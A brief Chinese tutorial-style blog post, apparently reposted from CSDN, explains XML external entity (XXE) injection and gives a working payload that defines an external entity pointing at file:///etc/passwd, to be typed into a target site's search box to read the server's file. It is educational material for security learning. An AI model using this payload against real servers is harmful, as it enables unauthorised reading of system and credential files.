xxe漏洞深度剖析

这个漏洞也叫xml实体注入,原因是没有对我们的输入进行严格的过滤

这个注入不像我们的sql注入一样可以得到数据库等等之类的,这个漏洞我们可以利用定义的外部实体来读取etc/passwd等内容

payload

<?xml version = "1.0"?>

<!DOCTYPE ANY [

         <!ENTITY f SYSTEM "file:///etc/passwd">

]>

<x>&f;</x>

   

xml语言的结构

可能存在漏洞的就是第二部分引用外部实体的地方

找到漏洞url

我们通过在这个搜索框里面输入构造的payload 即可读取对方服务器上的/etc/passed文件的内容

猜你喜欢

转载自blog.csdn.net/Bul1et/article/details/85045201